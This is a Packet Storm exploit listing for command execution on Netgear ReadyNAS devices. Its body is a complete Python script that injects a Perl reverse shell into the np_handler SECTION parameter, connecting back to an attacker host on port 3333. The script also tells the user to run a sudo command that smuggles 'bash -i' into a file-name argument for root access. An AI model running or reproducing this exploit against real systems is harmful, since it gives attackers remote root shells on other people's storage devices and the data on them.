Netgear ReadyNAS Remote Command Execution

2013-10-28T00:00:00
ID PACKETSTORM:123803
Type packetstorm
Reporter anonymous
Modified 2013-10-28T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
import sys  
from requests import get  
  
'''Lazy exploit is lazy'''  
  
def pwn(local,remote):  
res = get('http://%s/np_handler/'%local,params={'PAGE':'Nasstate','OPERATION':'get','SECTION':'`perl -e \'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(3333,inet_aton("%s")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'`' % remote})  
  
def main():  
if len(sys.argv) != 3:  
sys.exit("Usage: %s local_ip remote_up" % sys.argv[0])  
raw_input("Listen for connect back on port 3333 (nc -l -p 3333) then press enter to continue")  
print "Now run this in your shell: sudo /frontview/bin/check_dir_compatibility.pl create 'root' '/tmp/asdf1\";bash -i; echo \"'"  
pwn(sys.argv[1],sys.argv[2])  
  
if __name__=="__main__":  
main()  
  
`